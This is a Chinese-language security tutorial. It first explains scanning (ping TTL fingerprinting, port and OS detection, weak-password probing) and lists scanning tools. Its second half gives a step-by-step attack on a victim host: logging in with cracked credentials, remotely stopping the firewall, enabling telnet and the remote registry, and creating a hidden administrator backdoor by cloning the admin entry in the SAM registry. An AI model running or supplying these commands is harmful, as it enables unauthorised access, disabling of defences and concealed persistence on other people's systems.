频道栏目
首页 > 安全 > 工具软件 > 正文

扫描技术和扫描工具

2013-08-01 09:46:24            作者:甘兵
收藏   我要投稿

一、扫描技术概述

描描指的是利用工具软件来探测目标网络或主机的过程,其目的只有一个:为即将采取的攻击或防御行动收集情报

(1)、扫描原理

1、ping检测

ping命令是最常用的网络连接诊断工具,当然也可作为最基础的扫描工具

利生ICMP协议的响应机制,可以对目标IP地址、主机在线情况、操作系统类型等信息作出初步判断

 

【ping来判断目标主机的操作系统情况】

a)TTL值趋近于128:windows XP/windows server 2000/windows server 2003

b)TTL值趋近于64 :windows 7/windows 2008

c)TTL值趋近于255:交换机路由器等设备

如下图所示

 

 

2、端口扫描

Ø主要针对特定的网络服务进行探测,尝试连接目标主机的特定端口,根据反馈结果来判断是否开启指定服务

Ø分类:TCP端口扫描、UDP端口扫描

【TCP端口扫描】

会向对方发送一个请求或终止访问的数据包,若对方给出正常回应,则表示目标服务开启,否则表示端口关闭或可能被防火墙拦截

【UDP端口扫描】

通常会发送一个空数据包,若反馈错误消息,则表示目标服务开启,否则会告知端口不可达

【命令格式】

   telnet ip地址端口号如“telnet  192.168.4.17 21”

如下图所示

 

 

3、OS探测

Ø也就是操作系统(Operating System)探测,指的是获取目标主机所使用的操作系统类型,版本等相关信息的过程

Ø探测试式:随便访问一个不存在的网页,通常能够在出错页面上得到web服务程序的版本信息

如下图所示

 

 

4、弱口令探测

Ø弱口令探测的方式类似于暴力破解,只不过并不尝试所有可能的密码,而只是尝试安全性极差的密码,如“abc123、123456”等

5漏洞评估

Ø漏洞评估(或称弱点评估),一般用在正面的系统安全加固工作中,主要针对服务器系统各种已知的漏洞进行检测,同时对各种公认的或潜在的见险进行摸拟,从而全面判断目标主机的安全性

Ø漏洞评估通常由一系列独立的扫描插件来执行,而并不是单一的扫描任务

(2)、常见的扫描工具

1、SuperScan

一款免费的TCP/UDP端口扫描工具,网址“www.foundstone.com”

2、Fluxay(流光)

由国内的“小榕软件实验室”开发的一款强大的集成扫描软件,网址“www.netxeyes.com”

3、X-Scan

由国内的“安全焦点”出品的漏洞检洞工具,网址“www.xfocus.net”

4、MBSA

   MBSA全称“Microsoft BaselineSecurity Analyzer”微软基准安全分析

器,由微软公司开发的一款免费的操作系统安全评估工具,网址“www.microsoft.com”

5、Wikto

在Windows平台运行的Web弱点扫描工具,采用C#语言编写,网址

“www.sensepost.com”

二、创建隐藏用户的方法

本案例是用在被攻击者主机上创建,也可在自己的主机上创建

 

1、用扫描工具获取到对方的账户和密码

2、用获取到的账户和密码先进入系统(假如对方IP为192.168.10.10,扫描到的密码为123456)

   net use \\1962.168.10.10  /user:administrator 123456

3、远程关闭对方的防火墙

   sc \\192.168.10.10  stop  sharedaccess

4、远程开启对方的远程服务

   sc \\192.168.10.10  start  tlntsvr start= auto

   sc \\192.168.10.10  start  tlntsvr

5、远程开启对方的注册表服务

   sc \\192.168.10.10  config  remoteregistry  start= auto

   sc \\192.168.10.10  start  remoteregistry

6、远程登录系统

   telnet 192.168.10.10

7、创建隐藏用户(假如取名为benet)

   net user  benet$  123456 /add

8、打开本地注册表(regedit)

选择“文件”→→选择"连接到网络注册表"→→输入“对方IP:192.168.10.10”→→点击进入

9、赋予完全控制权限并编辑注册表

   HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account

      users:权限(F)、功能(V)在这个选项里

      Names:账户在这个选项里

把管理员权限(ox1-F4)“0000001F4”复制给benet用户(0x3eb)“0000003EB”

10、在导出benet用户的“Names”和“Users”

说白了就是做个备份,导入位置随便哪都行

11、远程删除benet用户

   net user  benet$  /del

12、最后,在导入刚才导出的benet用户

13、隐藏用户创建成功

 

《注意》:如果是在本地创建的话,前面6步就可以省略,直接从第7步开始

相关TAG标签 扫描工具 技术
上一篇:用TrueCrypt加密U盘文件
下一篇:ip头使用sqlmap注入
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站